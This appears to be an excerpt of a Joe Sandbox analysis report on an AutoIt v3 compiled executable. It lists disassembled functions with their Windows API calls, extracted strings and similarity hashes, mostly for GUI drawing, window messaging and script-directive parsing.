                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-2771358697
                                                                                                                      • Opcode ID: 196c40c6367a8ca1b416a21aa4437e1cb20bfbc206de97582c014386b4dda42d
                                                                                                                      • Instruction ID: 8fd3a43c480f5496e149d548caa9747536212eb7760476244c6b710ea508c136
                                                                                                                      • Opcode Fuzzy Hash: 196c40c6367a8ca1b416a21aa4437e1cb20bfbc206de97582c014386b4dda42d
                                                                                                                      • Instruction Fuzzy Hash: B3A182B1A00219BFEB15DFA5DC4AFAE7BB9EB05710F104125F614AB2E0D7B0AD01CB64
                                                                                                                      Function 0040D385 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0040D3BE
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0040D3C2
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040D3D8
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040D3E3
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0040D3E8
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0040D400
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0040D40E
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040D41F
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0040D428
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040D435
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0040D454
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0040D46B
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D480
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0040D4A8
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0040D4CF
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0040D4ED
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0040D4F8
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0040D506
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040D50E
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0040D522
                                                                                                                      • SelectObject.GDI32(?,0040D0B5), ref: 0040D539
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D544
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040D54A
                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D54F
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0040D555
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040D55F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 1996641542-2594219639
                                                                                                                      • Opcode ID: 21147695d566ccac64605ec2216267e236bc4605dbdbce23e77757aca80666ad
                                                                                                                      • Instruction ID: 8ae2fe7a1a36bcd9a444165d47efd45b16ad4d13869e25c96e499bcf143e1b79
                                                                                                                      • Opcode Fuzzy Hash: 21147695d566ccac64605ec2216267e236bc4605dbdbce23e77757aca80666ad
                                                                                                                      • Instruction Fuzzy Hash: 13513B71E00208BFDF209FA8DC48EAEBBB9EF48320F604525F915AB2A1D7759941DB54
                                                                                                                      Function 003EE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EE45E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,0043DC88,?,\\.\,0043DBF0), ref: 003EE54B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,0043DC88,?,\\.\,0043DBF0), ref: 003EE6B1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: 4a969ef483fe41ab6d74115b833094914877cd86e00b53b336c04ad6de04b8f4
                                                                                                                      • Instruction ID: 6b7e25e2e140c4cbec0f11a0a0e5877224ff2684d06f95daf7107391f46fee8f
                                                                                                                      • Opcode Fuzzy Hash: 4a969ef483fe41ab6d74115b833094914877cd86e00b53b336c04ad6de04b8f4
                                                                                                                      • Instruction Fuzzy Hash: 33513831204391EBC203DF16C891969B794FB55346F318B1AF802AB7D2D720EE49DB4E
                                                                                                                      Function 003A48C8 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 491windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32 ref: 003A4956
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003A4998
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 003A49A3
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 003A49AE
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 003A49B9
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0041E179
                                                                                                                      • 6FB80200.COMCTL32(?,000000FF,?), ref: 0041E1B2
                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0041E5E0
                                                                                                                        • Part of subcall function 003A49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003A4954,00000000), ref: 003A4A23
                                                                                                                      • SendMessageW.USER32 ref: 0041E627
                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0041E63E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyMessageSendWindow$DeleteObject$B80200CursorInvalidateMoveRect
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 295266683-975001249
                                                                                                                      • Opcode ID: 3c8a57c5973b9e99dc41c00fa659afa7da5eda259c5a238b30777a17dc67d41a
                                                                                                                      • Instruction ID: a7fc5cf753233d703f8ab270cb3cd848df53bd23a41c700b25d279212a0e4b1f
                                                                                                                      • Opcode Fuzzy Hash: 3c8a57c5973b9e99dc41c00fa659afa7da5eda259c5a238b30777a17dc67d41a
                                                                                                                      • Instruction Fuzzy Hash: EA12CC34600201EFDB21CF25C884BABBBE5FF45304F64446EE999CB262C775E896CB95
                                                                                                                      Function 0040C4F9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0040C598
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040C64E
                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 0040C669
                                                                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0040C925
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 2326795674-975001249
                                                                                                                      • Opcode ID: 8846672fe0a4b373ea8cc71fe851808ddee50accf29d734fcaaf6f6fb94bf6e4
                                                                                                                      • Instruction ID: d971466ce72b72f7bbf66b464372a7c9c3cbdcf84363fcfcad341705a3710290
                                                                                                                      • Opcode Fuzzy Hash: 8846672fe0a4b373ea8cc71fe851808ddee50accf29d734fcaaf6f6fb94bf6e4
                                                                                                                      • Instruction Fuzzy Hash: 37F1AF71604301EFD7218F24C885BABBBE4FF49354F184A3AF584A62E1C778D845DB9A
                                                                                                                      Function 003AC714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: 30080b5eca85e13892020d702234755a30c4d9ad0f5cff444ab28e8fce3d3675
                                                                                                                      • Instruction ID: 1e966a9352a1e1936da770d29076d8b78e4bc8e4a4114e1b3367622c65fbe4c0
                                                                                                                      • Opcode Fuzzy Hash: 30080b5eca85e13892020d702234755a30c4d9ad0f5cff444ab28e8fce3d3675
                                                                                                                      • Instruction Fuzzy Hash: 3D6159316003017BDB27AE249C42FBB335CEF06740F14102AFD51EA582EB69CE41C7A5
                                                                                                                      Function 00406189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,0043DBF0), ref: 00406245
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                      • Opcode ID: db3fdfaf5fa226153b53cb835087589e0b24fa8ff50c174879de417bdff09917
                                                                                                                      • Instruction ID: f4a56dd612cd9c8d13a9454e16a1441344b93b3b9e9f7ba1e49c9cc328182bb6
                                                                                                                      • Opcode Fuzzy Hash: db3fdfaf5fa226153b53cb835087589e0b24fa8ff50c174879de417bdff09917
                                                                                                                      • Instruction Fuzzy Hash: B2C1E5342042018FCB05EF14C851AAE7792AF85354F05587AB883AF3D7DB38DD5ACB8A
                                                                                                                      Function 0040B4D4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0040B5C0
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040B5D1
                                                                                                                      • CharNextW.USER32(0000014E), ref: 0040B600
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0040B641
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0040B657
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040B668
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0040B685
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0040B6D7
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0040B6ED
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0040B71E
                                                                                                                      • _memset.LIBCMT ref: 0040B743
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0040B78C
                                                                                                                      • _memset.LIBCMT ref: 0040B7EB
                                                                                                                      • SendMessageW.USER32 ref: 0040B815
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0040B86D
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0040B91A
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040B93C
                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 0040B986
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0040B9B3
                                                                                                                      • DrawMenuBar.USER32(?), ref: 0040B9C2
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0040B9EA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0$@U=u
                                                                                                                      • API String ID: 1073566785-975001249
                                                                                                                      • Opcode ID: 71bd76cd2a513ed49a9926dfaf493410c9e646f1d225d6e38490be6cd9203da5
                                                                                                                      • Instruction ID: b2af1cdda7dbf139caeeed107b2d1df88115a2ce8044ec2a44fcde05ce840da6
                                                                                                                      • Opcode Fuzzy Hash: 71bd76cd2a513ed49a9926dfaf493410c9e646f1d225d6e38490be6cd9203da5
                                                                                                                      • Instruction Fuzzy Hash: D7E17071A00218ABDB219F55CC84EEE7BB8FF05714F10816AF915BB2D0D7788A41DFA9
                                                                                                                      Function 0040744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00407587
                                                                                                                      • GetDesktopWindow.USER32 ref: 0040759C
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004075A3
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00407605
                                                                                                                      • DestroyWindow.USER32(?), ref: 00407631
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040765A
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00407678
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0040769E
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004076B3
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004076C6
                                                                                                                      • IsWindowVisible.USER32(?), ref: 004076E6
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00407701
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00407715
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040772D
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00407753
                                                                                                                      • GetMonitorInfoW.USER32 ref: 0040776D
                                                                                                                      • CopyRect.USER32(?,?), ref: 00407784
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 004077EF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: be14a1de9dcd79c7079b3d5e1d4e2552463a65daf6b23b2305afe91637cdbe8a
                                                                                                                      • Instruction ID: 93482742a0ab16d59ffc4e209a0169ffadcefc5f7f03564a79180654f0ff26e1
                                                                                                                      • Opcode Fuzzy Hash: be14a1de9dcd79c7079b3d5e1d4e2552463a65daf6b23b2305afe91637cdbe8a
                                                                                                                      • Instruction Fuzzy Hash: C2B18F71A08300AFDB14DF64C944B6ABBE5FF89310F00892EF599AB291DB75EC05CB56
                                                                                                                      Function 003BA756 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003BA839
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 003BA841
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003BA86C
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 003BA874
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 003BA899
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003BA8B6
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003BA8C6
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003BA8F9
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003BA90D
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 003BA92B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003BA947
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 003BA952
                                                                                                                        • Part of subcall function 003BB736: GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                        • Part of subcall function 003BB736: ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                        • Part of subcall function 003BB736: GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,003BACEE), ref: 003BA979
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: @U=u$AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-2077007950
                                                                                                                      • Opcode ID: 20af90497393a097632782d9c1fe4172eaf36834d1395c808c516d464ca90020
                                                                                                                      • Instruction ID: 27a1b7851b18c1016b4f386ba2ea67d9656a8a447f3cdc8a1d11d4a7030eb136
                                                                                                                      • Opcode Fuzzy Hash: 20af90497393a097632782d9c1fe4172eaf36834d1395c808c516d464ca90020
                                                                                                                      • Instruction Fuzzy Hash: 11B18D35A0060AAFDB15EFA8CC45BEE7BB4FB08314F11422AFA05E72A0DB74D841CB55
                                                                                                                      Function 003DF898 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 168windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000063), ref: 003DF8AB
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003DF8BD
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003DF8D4
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 003DF8E9
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003DF8EF
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DF8FF
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 003DF905
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003DF926
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003DF940
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003DF949
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 003DF9B4
                                                                                                                      • GetDesktopWindow.USER32 ref: 003DF9BA
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 003DF9C1
